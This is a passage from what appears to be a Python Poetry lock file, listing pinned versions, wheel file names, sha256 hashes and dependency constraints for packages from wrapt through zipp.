"sha256:41d07d029dd4157ae27beab04d22b8e261eddfc6ecd64ff7000b10dc8b3a5727"}, {file = "wrapt-1.15.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:54accd4b8bc202966bafafd16e69da9d5640ff92389d33d28555c5fd4f25ccb7"}, {file = "wrapt-1.15.0-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:2fbfbca668dd15b744418265a9607baa970c347eefd0db6a518aaf0cfbd153c0"}, {file = "wrapt-1.15.0-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:76e9c727a874b4856d11a32fb0b389afc61ce8aaf281ada613713ddeadd1cfec"}, {file = "wrapt-1.15.0-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:e20076a211cd6f9b44a6be58f7eeafa7ab5720eb796975d0c03f05b47d89eb90"}, {file = "wrapt-1.15.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:a74d56552ddbde46c246b5b89199cb3fd182f9c346c784e1a93e4dc3f5ec9975"}, {file = "wrapt-1.15.0-cp310-cp310-win32.whl", hash = "sha256:26458da5653aa5b3d8dc8b24192f574a58984c749401f98fff994d41d3f08da1"}, {file = "wrapt-1.15.0-cp310-cp310-win_amd64.whl", hash = "sha256:75760a47c06b5974aa5e01949bf7e66d2af4d08cb8c1d6516af5e39595397f5e"}, {file = "wrapt-1.15.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:ba1711cda2d30634a7e452fc79eabcadaffedf241ff206db2ee93dd2c89a60e7"}, {file = "wrapt-1.15.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:56374914b132c702aa9aa9959c550004b8847148f95e1b824772d453ac204a72"}, {file = "wrapt-1.15.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a89ce3fd220ff144bd9d54da333ec0de0399b52c9ac3d2ce34b569cf1a5748fb"}, {file = "wrapt-1.15.0-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:3bbe623731d03b186b3d6b0d6f51865bf598587c38d6f7b0be2e27414f7f214e"}, {file = "wrapt-1.15.0-cp311-cp311-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3abbe948c3cbde2689370a262a8d04e32ec2dd4f27103669a45c6929bcdbfe7c"}, {file = "wrapt-1.15.0-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:b67b819628e3b748fd3c2192c15fb951f549d0f47c0449af0764d7647302fda3"}, {file = "wrapt-1.15.0-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:7eebcdbe3677e58dd4c0e03b4f2cfa346ed4049687d839adad68cc38bb559c92"}, {file = "wrapt-1.15.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:74934ebd71950e3db69960a7da29204f89624dde411afbfb3b4858c1409b1e98"}, {file = "wrapt-1.15.0-cp311-cp311-win32.whl", hash = "sha256:bd84395aab8e4d36263cd1b9308cd504f6cf713b7d6d3ce25ea55670baec5416"}, {file = "wrapt-1.15.0-cp311-cp311-win_amd64.whl", hash = "sha256:a487f72a25904e2b4bbc0817ce7a8de94363bd7e79890510174da9d901c38705"}, {file = "wrapt-1.15.0-cp35-cp35m-manylinux1_i686.whl", hash = "sha256:4ff0d20f2e670800d3ed2b220d40984162089a6e2c9646fdb09b85e6f9a8fc29"}, {file = "wrapt-1.15.0-cp35-cp35m-manylinux1_x86_64.whl", hash = "sha256:9ed6aa0726b9b60911f4aed8ec5b8dd7bf3491476015819f56473ffaef8959bd"}, {file = "wrapt-1.15.0-cp35-cp35m-manylinux2010_i686.whl", hash = "sha256:896689fddba4f23ef7c718279e42f8834041a21342d95e56922e1c10c0cc7afb"}, {file = "wrapt-1.15.0-cp35-cp35m-manylinux2010_x86_64.whl", hash = "sha256:75669d77bb2c071333417617a235324a1618dba66f82a750362eccbe5b61d248"}, {file = "wrapt-1.15.0-cp35-cp35m-win32.whl", hash = "sha256:fbec11614dba0424ca72f4e8ba3c420dba07b4a7c206c8c8e4e73f2e98f4c559"}, {file = "wrapt-1.15.0-cp35-cp35m-win_amd64.whl", hash = "sha256:fd69666217b62fa5d7c6aa88e507493a34dec4fa20c5bd925e4bc12fce586639"}, {file = "wrapt-1.15.0-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:b0724f05c396b0a4c36a3226c31648385deb6a65d8992644c12a4963c70326ba"}, {file = "wrapt-1.15.0-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:bbeccb1aa40ab88cd29e6c7d8585582c99548f55f9b2581dfc5ba68c59a85752"}, {file = "wrapt-1.15.0-cp36-cp36m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:38adf7198f8f154502883242f9fe7333ab05a5b02de7d83aa2d88ea621f13364"}, {file = "wrapt-1.15.0-cp36-cp36m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:578383d740457fa790fdf85e6d346fda1416a40549fe8db08e5e9bd281c6a475"}, {file = "wrapt-1.15.0-cp36-cp36m-musllinux_1_1_aarch64.whl", hash = "sha256:a4cbb9ff5795cd66f0066bdf5947f170f5d63a9274f99bdbca02fd973adcf2a8"}, {file = "wrapt-1.15.0-cp36-cp36m-musllinux_1_1_i686.whl", hash = "sha256:af5bd9ccb188f6a5fdda9f1f09d9f4c86cc8a539bd48a0bfdc97723970348418"}, {file = "wrapt-1.15.0-cp36-cp36m-musllinux_1_1_x86_64.whl", hash = "sha256:b56d5519e470d3f2fe4aa7585f0632b060d532d0696c5bdfb5e8319e1d0f69a2"}, {file = "wrapt-1.15.0-cp36-cp36m-win32.whl", hash = "sha256:77d4c1b881076c3ba173484dfa53d3582c1c8ff1f914c6461ab70c8428b796c1"}, {file = "wrapt-1.15.0-cp36-cp36m-win_amd64.whl", hash = "sha256:077ff0d1f9d9e4ce6476c1a924a3332452c1406e59d90a2cf24aeb29eeac9420"}, {file = "wrapt-1.15.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:5c5aa28df055697d7c37d2099a7bc09f559d5053c3349b1ad0c39000e611d317"}, {file = "wrapt-1.15.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3a8564f283394634a7a7054b7983e47dbf39c07712d7b177b37e03f2467a024e"}, {file = "wrapt-1.15.0-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:780c82a41dc493b62fc5884fb1d3a3b81106642c5c5c78d6a0d4cbe96d62ba7e"}, {file = "wrapt-1.15.0-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e169e957c33576f47e21864cf3fc9ff47c223a4ebca8960079b8bd36cb014fd0"}, {file = "wrapt-1.15.0-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:b02f21c1e2074943312d03d243ac4388319f2456576b2c6023041c4d57cd7019"}, {file = "wrapt-1.15.0-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:f2e69b3ed24544b0d3dbe2c5c0ba5153ce50dcebb576fdc4696d52aa22db6034"}, {file = "wrapt-1.15.0-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:d787272ed958a05b2c86311d3a4135d3c2aeea4fc655705f074130aa57d71653"}, {file = "wrapt-1.15.0-cp37-cp37m-win32.whl", hash = "sha256:02fce1852f755f44f95af51f69d22e45080102e9d00258053b79367d07af39c0"}, {file = "wrapt-1.15.0-cp37-cp37m-win_amd64.whl", hash = "sha256:abd52a09d03adf9c763d706df707c343293d5d106aea53483e0ec8d9e310ad5e"}, {file = "wrapt-1.15.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:cdb4f085756c96a3af04e6eca7f08b1345e94b53af8921b25c72f096e704e145"}, {file = "wrapt-1.15.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:230ae493696a371f1dbffaad3dafbb742a4d27a0afd2b1aecebe52b740167e7f"}, {file = "wrapt-1.15.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:63424c681923b9f3bfbc5e3205aafe790904053d42ddcc08542181a30a7a51bd"}, {file = "wrapt-1.15.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:d6bcbfc99f55655c3d93feb7ef3800bd5bbe963a755687cbf1f490a71fb7794b"}, {file = "wrapt-1.15.0-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c99f4309f5145b93eca6e35ac1a988f0dc0a7ccf9ccdcd78d3c0adf57224e62f"}, {file = "wrapt-1.15.0-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:b130fe77361d6771ecf5a219d8e0817d61b236b7d8b37cc045172e574ed219e6"}, {file = "wrapt-1.15.0-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:96177eb5645b1c6985f5c11d03fc2dbda9ad24ec0f3a46dcce91445747e15094"}, {file = "wrapt-1.15.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:d5fe3e099cf07d0fb5a1e23d399e5d4d1ca3e6dfcbe5c8570ccff3e9208274f7"}, {file = "wrapt-1.15.0-cp38-cp38-win32.whl", hash = "sha256:abd8f36c99512755b8456047b7be10372fca271bf1467a1caa88db991e7c421b"}, {file = "wrapt-1.15.0-cp38-cp38-win_amd64.whl", hash = "sha256:b06fa97478a5f478fb05e1980980a7cdf2712015493b44d0c87606c1513ed5b1"}, {file = "wrapt-1.15.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:2e51de54d4fb8fb50d6ee8327f9828306a959ae394d3e01a1ba8b2f937747d86"}, {file = "wrapt-1.15.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:0970ddb69bba00670e58955f8019bec4a42d1785db3faa043c33d81de2bf843c"}, {file = "wrapt-1.15.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:76407ab327158c510f44ded207e2f76b657303e17cb7a572ffe2f5a8a48aa04d"}, {file = "wrapt-1.15.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:cd525e0e52a5ff16653a3fc9e3dd827981917d34996600bbc34c05d048ca35cc"}, {file = "wrapt-1.15.0-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9d37ac69edc5614b90516807de32d08cb8e7b12260a285ee330955604ed9dd29"}, {file = "wrapt-1.15.0-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:078e2a1a86544e644a68422f881c48b84fef6d18f8c7a957ffd3f2e0a74a0d4a"}, {file = "wrapt-1.15.0-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:2cf56d0e237280baed46f0b5316661da892565ff58309d4d2ed7dba763d984b8"}, {file = "wrapt-1.15.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:7dc0713bf81287a00516ef43137273b23ee414fe41a3c14be10dd95ed98a2df9"}, {file = "wrapt-1.15.0-cp39-cp39-win32.whl", hash = "sha256:46ed616d5fb42f98630ed70c3529541408166c22cdfd4540b88d5f21006b0eff"}, {file = "wrapt-1.15.0-cp39-cp39-win_amd64.whl", hash = "sha256:eef4d64c650f33347c1f9266fa5ae001440b232ad9b98f1f43dfe7a79435c0a6"}, {file = "wrapt-1.15.0-py3-none-any.whl", hash = "sha256:64b1df0f83706b4ef4cfb4fb0e4c2669100fd7ecacfb59e091fad300d4e04640"}, {file = "wrapt-1.15.0.tar.gz", hash = "sha256:d06730c6aed78cee4126234cf2d071e01b44b915e725a6cb439a879ec9754a3a"}, ] [[package]] name = "xata" version = "1.2.0" description = "Python SDK for Xata.io" optional = true python-versions = ">=3.8,<4.0" files = [ {file = "xata-1.2.0-py3-none-any.whl", hash = "sha256:a3710a273c0b64464080e332e24a1754a7fc9076a4117af558353c57f25c23e1"}, {file = "xata-1.2.0.tar.gz", hash = "sha256:048bf24c8aa3d09241dbe9f2a31513ce62c75c06ea3aa5822f000d2eac116462"}, ] [package.dependencies] deprecation = ">=2.1.0,<3.0.0" orjson = ">=3.8.1,<4.0.0" python-dotenv = ">=0.21,<2.0" requests = ">=2.28.1,<3.0.0" [[package]] name = "xformers" version = "0.0.16" description = "XFormers: A collection of composable Transformer building blocks." optional = true python-versions = ">=3.7" files = [ {file = "xformers-0.0.16-cp310-cp310-manylinux2014_x86_64.whl", hash = "sha256:a64a77663258b696bef3986488cd7df4f35e320355a7fe0bf86e8eff41726f0e"}, {file = "xformers-0.0.16-cp310-cp310-win_amd64.whl", hash = "sha256:302294fa8ae34c2a4602fd13ef7aceb71111e02b4e373c6366580a5159fec8e8"}, {file = "xformers-0.0.16-cp37-cp37m-manylinux2014_x86_64.whl", hash = "sha256:4f4ff62e7a8d66d6ab96c70f7f6c75e0e48a22e0484cf03b4506312c5e6e1806"}, {file = "xformers-0.0.16-cp37-cp37m-win_amd64.whl", hash = "sha256:e7263225564593abfbdfa3638fa3171be7214787bf47c5f476beb48369353d78"}, {file = "xformers-0.0.16-cp38-cp38-manylinux2014_x86_64.whl", hash = "sha256:a8b34e99b7cd6928a446bb02fd54665bfe8e7c3ec796c41a739b656e7c5f2473"}, {file = "xformers-0.0.16-cp38-cp38-win_amd64.whl", hash = "sha256:07efbf5188fb1ef05cd16c93e4a6d9ac4992a1e5296fd432aeeb151ea24b40d0"}, {file = "xformers-0.0.16-cp39-cp39-manylinux2014_x86_64.whl", hash = "sha256:d1538e14fe7759ddc3c7a51c94a4d7a9395d63e7b9baa5e14f1d4c0b04242c12"}, {file = "xformers-0.0.16-cp39-cp39-win_amd64.whl", hash = "sha256:ca67b6f25de878e4c816849cc7e6fa46bb675a429f151b1b66e4b10769ba7173"}, {file = "xformers-0.0.16.tar.gz", hash = "sha256:92c7f0556a68f4486492691b3f567140ee192b563d904185b6669b1f8bb8ae53"}, ] [package.dependencies] numpy = "*" pyre-extensions = "0.0.23" torch = "1.13.1" [[package]] name = "xmltodict" version = "0.13.0" description = "Makes working with XML feel like you are working with JSON" optional = true python-versions = ">=3.4" files = [ {file = "xmltodict-0.13.0-py2.py3-none-any.whl", hash = "sha256:aa89e8fd76320154a40d19a0df04a4695fb9dc5ba977cbb68ab3e4eb225e7852"}, {file = "xmltodict-0.13.0.tar.gz", hash = "sha256:341595a488e3e01a85a9d8911d8912fd922ede5fecc4dce437eb4b6c8d037e56"}, ] [[package]] name = "yarl" version = "1.9.2" description = "Yet another URL library" optional = false python-versions = ">=3.7" files = [ {file = "yarl-1.9.2-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:8c2ad583743d16ddbdf6bb14b5cd76bf43b0d0006e918809d5d4ddf7bde8dd82"}, {file = "yarl-1.9.2-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:82aa6264b36c50acfb2424ad5ca537a2060ab6de158a5bd2a72a032cc75b9eb8"}, {file = "yarl-1.9.2-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:c0c77533b5ed4bcc38e943178ccae29b9bcf48ffd1063f5821192f23a1bd27b9"}, {file = "yarl-1.9.2-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ee4afac41415d52d53a9833ebae7e32b344be72835bbb589018c9e938045a560"}, {file = "yarl-1.9.2-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:9bf345c3a4f5ba7f766430f97f9cc1320786f19584acc7086491f45524a551ac"}, {file = "yarl-1.9.2-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:2a96c19c52ff442a808c105901d0bdfd2e28575b3d5f82e2f5fd67e20dc5f4ea"}, {file = "yarl-1.9.2-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:891c0e3ec5ec881541f6c5113d8df0315ce5440e244a716b95f2525b7b9f3608"}, {file = "yarl-1.9.2-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:c3a53ba34a636a256d767c086ceb111358876e1fb6b50dfc4d3f4951d40133d5"}, {file = "yarl-1.9.2-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:566185e8ebc0898b11f8026447eacd02e46226716229cea8db37496c8cdd26e0"}, {file = "yarl-1.9.2-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:2b0738fb871812722a0ac2154be1f049c6223b9f6f22eec352996b69775b36d4"}, {file = "yarl-1.9.2-cp310-cp310-musllinux_1_1_ppc64le.whl", hash = "sha256:32f1d071b3f362c80f1a7d322bfd7b2d11e33d2adf395cc1dd4df36c9c243095"}, {file = "yarl-1.9.2-cp310-cp310-musllinux_1_1_s390x.whl", hash = "sha256:e9fdc7ac0d42bc3ea78818557fab03af6181e076a2944f43c38684b4b6bed8e3"}, {file = "yarl-1.9.2-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:56ff08ab5df8429901ebdc5d15941b59f6253393cb5da07b4170beefcf1b2528"}, {file = "yarl-1.9.2-cp310-cp310-win32.whl", hash = "sha256:8ea48e0a2f931064469bdabca50c2f578b565fc446f302a79ba6cc0ee7f384d3"}, {file = "yarl-1.9.2-cp310-cp310-win_amd64.whl", hash = "sha256:50f33040f3836e912ed16d212f6cc1efb3231a8a60526a407aeb66c1c1956dde"}, {file = "yarl-1.9.2-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:646d663eb2232d7909e6601f1a9107e66f9791f290a1b3dc7057818fe44fc2b6"}, {file = "yarl-1.9.2-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:aff634b15beff8902d1f918012fc2a42e0dbae6f469fce134c8a0dc51ca423bb"}, {file = "yarl-1.9.2-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:a83503934c6273806aed765035716216cc9ab4e0364f7f066227e1aaea90b8d0"}, {file = "yarl-1.9.2-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b25322201585c69abc7b0e89e72790469f7dad90d26754717f3310bfe30331c2"}, {file = "yarl-1.9.2-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:22a94666751778629f1ec4280b08eb11815783c63f52092a5953faf73be24191"}, {file = "yarl-1.9.2-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:8ec53a0ea2a80c5cd1ab397925f94bff59222aa3cf9c6da938ce05c9ec20428d"}, {file = "yarl-1.9.2-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:159d81f22d7a43e6eabc36d7194cb53f2f15f498dbbfa8edc8a3239350f59fe7"}, {file = "yarl-1.9.2-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:832b7e711027c114d79dffb92576acd1bd2decc467dec60e1cac96912602d0e6"}, {file = "yarl-1.9.2-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:95d2ecefbcf4e744ea952d073c6922e72ee650ffc79028eb1e320e732898d7e8"}, {file = "yarl-1.9.2-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:d4e2c6d555e77b37288eaf45b8f60f0737c9efa3452c6c44626a5455aeb250b9"}, {file = "yarl-1.9.2-cp311-cp311-musllinux_1_1_ppc64le.whl", hash = "sha256:783185c75c12a017cc345015ea359cc801c3b29a2966c2655cd12b233bf5a2be"}, {file = "yarl-1.9.2-cp311-cp311-musllinux_1_1_s390x.whl", hash = "sha256:b8cc1863402472f16c600e3e93d542b7e7542a540f95c30afd472e8e549fc3f7"}, {file = "yarl-1.9.2-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:822b30a0f22e588b32d3120f6d41e4ed021806418b4c9f0bc3048b8c8cb3f92a"}, {file = "yarl-1.9.2-cp311-cp311-win32.whl", hash = "sha256:a60347f234c2212a9f0361955007fcf4033a75bf600a33c88a0a8e91af77c0e8"}, {file = "yarl-1.9.2-cp311-cp311-win_amd64.whl", hash = "sha256:be6b3fdec5c62f2a67cb3f8c6dbf56bbf3f61c0f046f84645cd1ca73532ea051"}, {file = "yarl-1.9.2-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:38a3928ae37558bc1b559f67410df446d1fbfa87318b124bf5032c31e3447b74"}, {file = "yarl-1.9.2-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ac9bb4c5ce3975aeac288cfcb5061ce60e0d14d92209e780c93954076c7c4367"}, {file = "yarl-1.9.2-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:3da8a678ca8b96c8606bbb8bfacd99a12ad5dd288bc6f7979baddd62f71c63ef"}, {file = "yarl-1.9.2-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:13414591ff516e04fcdee8dc051c13fd3db13b673c7a4cb1350e6b2ad9639ad3"}, {file = "yarl-1.9.2-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:bf74d08542c3a9ea97bb8f343d4fcbd4d8f91bba5ec9d5d7f792dbe727f88938"}, {file = "yarl-1.9.2-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6e7221580dc1db478464cfeef9b03b95c5852cc22894e418562997df0d074ccc"}, {file = "yarl-1.9.2-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:494053246b119b041960ddcd20fd76224149cfea8ed8777b687358727911dd33"}, {file = "yarl-1.9.2-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:52a25809fcbecfc63ac9ba0c0fb586f90837f5425edfd1ec9f3372b119585e45"}, {file = "yarl-1.9.2-cp37-cp37m-musllinux_1_1_ppc64le.whl", hash = "sha256:e65610c5792870d45d7b68c677681376fcf9cc1c289f23e8e8b39c1485384185"}, {file = "yarl-1.9.2-cp37-cp37m-musllinux_1_1_s390x.whl", hash = "sha256:1b1bba902cba32cdec51fca038fd53f8beee88b77efc373968d1ed021024cc04"}, {file = "yarl-1.9.2-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:662e6016409828ee910f5d9602a2729a8a57d74b163c89a837de3fea050c7582"}, {file = "yarl-1.9.2-cp37-cp37m-win32.whl", hash = "sha256:f364d3480bffd3aa566e886587eaca7c8c04d74f6e8933f3f2c996b7f09bee1b"}, {file = "yarl-1.9.2-cp37-cp37m-win_amd64.whl", hash = "sha256:6a5883464143ab3ae9ba68daae8e7c5c95b969462bbe42e2464d60e7e2698368"}, {file = "yarl-1.9.2-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:5610f80cf43b6202e2c33ba3ec2ee0a2884f8f423c8f4f62906731d876ef4fac"}, {file = "yarl-1.9.2-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:b9a4e67ad7b646cd6f0938c7ebfd60e481b7410f574c560e455e938d2da8e0f4"}, {file = "yarl-1.9.2-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:83fcc480d7549ccebe9415d96d9263e2d4226798c37ebd18c930fce43dfb9574"}, {file = "yarl-1.9.2-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:5fcd436ea16fee7d4207c045b1e340020e58a2597301cfbcfdbe5abd2356c2fb"}, {file = "yarl-1.9.2-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:84e0b1599334b1e1478db01b756e55937d4614f8654311eb26012091be109d59"}, {file = "yarl-1.9.2-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:3458a24e4ea3fd8930e934c129b676c27452e4ebda80fbe47b56d8c6c7a63a9e"}, {file = "yarl-1.9.2-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:838162460b3a08987546e881a2bfa573960bb559dfa739e7800ceeec92e64417"}, {file = "yarl-1.9.2-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:f4e2d08f07a3d7d3e12549052eb5ad3eab1c349c53ac51c209a0e5991bbada78"}, {file = "yarl-1.9.2-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:de119f56f3c5f0e2fb4dee508531a32b069a5f2c6e827b272d1e0ff5ac040333"}, {file = "yarl-1.9.2-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:149ddea5abf329752ea5051b61bd6c1d979e13fbf122d3a1f9f0c8be6cb6f63c"}, {file = "yarl-1.9.2-cp38-cp38-musllinux_1_1_ppc64le.whl", hash = "sha256:674ca19cbee4a82c9f54e0d1eee28116e63bc6fd1e96c43031d11cbab8b2afd5"}, {file = "yarl-1.9.2-cp38-cp38-musllinux_1_1_s390x.whl", hash = "sha256:9b3152f2f5677b997ae6c804b73da05a39daa6a9e85a512e0e6823d81cdad7cc"}, {file = "yarl-1.9.2-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:5415d5a4b080dc9612b1b63cba008db84e908b95848369aa1da3686ae27b6d2b"}, {file = "yarl-1.9.2-cp38-cp38-win32.whl", hash = "sha256:f7a3d8146575e08c29ed1cd287068e6d02f1c7bdff8970db96683b9591b86ee7"}, {file = "yarl-1.9.2-cp38-cp38-win_amd64.whl", hash = "sha256:63c48f6cef34e6319a74c727376e95626f84ea091f92c0250a98e53e62c77c72"}, {file = "yarl-1.9.2-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:75df5ef94c3fdc393c6b19d80e6ef1ecc9ae2f4263c09cacb178d871c02a5ba9"}, {file = "yarl-1.9.2-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:c027a6e96ef77d401d8d5a5c8d6bc478e8042f1e448272e8d9752cb0aff8b5c8"}, {file = "yarl-1.9.2-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:f3b078dbe227f79be488ffcfc7a9edb3409d018e0952cf13f15fd6512847f3f7"}, {file = "yarl-1.9.2-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:59723a029760079b7d991a401386390c4be5bfec1e7dd83e25a6a0881859e716"}, {file = "yarl-1.9.2-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:b03917871bf859a81ccb180c9a2e6c1e04d2f6a51d953e6a5cdd70c93d4e5a2a"}, {file = "yarl-1.9.2-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:c1012fa63eb6c032f3ce5d2171c267992ae0c00b9e164efe4d73db818465fac3"}, {file = "yarl-1.9.2-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a74dcbfe780e62f4b5a062714576f16c2f3493a0394e555ab141bf0d746bb955"}, {file = "yarl-1.9.2-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:8c56986609b057b4839968ba901944af91b8e92f1725d1a2d77cbac6972b9ed1"}, {file = "yarl-1.9.2-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:2c315df3293cd521033533d242d15eab26583360b58f7ee5d9565f15fee1bef4"}, {file = "yarl-1.9.2-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:b7232f8dfbd225d57340e441d8caf8652a6acd06b389ea2d3222b8bc89cbfca6"}, {file = "yarl-1.9.2-cp39-cp39-musllinux_1_1_ppc64le.whl", hash = "sha256:53338749febd28935d55b41bf0bcc79d634881195a39f6b2f767870b72514caf"}, {file = "yarl-1.9.2-cp39-cp39-musllinux_1_1_s390x.whl", hash = "sha256:066c163aec9d3d073dc9ffe5dd3ad05069bcb03fcaab8d221290ba99f9f69ee3"}, {file = "yarl-1.9.2-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:8288d7cd28f8119b07dd49b7230d6b4562f9b61ee9a4ab02221060d21136be80"}, {file = "yarl-1.9.2-cp39-cp39-win32.whl", hash = "sha256:b124e2a6d223b65ba8768d5706d103280914d61f5cae3afbc50fc3dfcc016623"}, {file = "yarl-1.9.2-cp39-cp39-win_amd64.whl", hash = "sha256:61016e7d582bc46a5378ffdd02cd0314fb8ba52f40f9cf4d9a5e7dbef88dee18"}, {file = "yarl-1.9.2.tar.gz", hash = "sha256:04ab9d4b9f587c06d801c2abfe9317b77cdf996c65a90d5e84ecc45010823571"}, ] [package.dependencies] idna = ">=2.0" multidict = ">=4.0" [[package]] name = "zipp" version = "3.17.0" description = "Backport of pathlib-compatible object wrapper for zip files" optional = false python-versions = ">=3.8" files = [ {file = "zipp-3.17.0-py3-none-any.whl", hash = "sha256:0e923e726174922dce09c53c59ad483ff7bbb8e572e00c7f7c46b88556409f31"}, {file = "zipp-3.17.0.tar.gz", hash = "sha256:84e64a1c28cf7e91ed2078bb8cc8c259cb19b76942096c8d7b84947690cabaf0"}, ] [package.extras] docs = ["furo", "jaraco.packaging (>=9.3)", 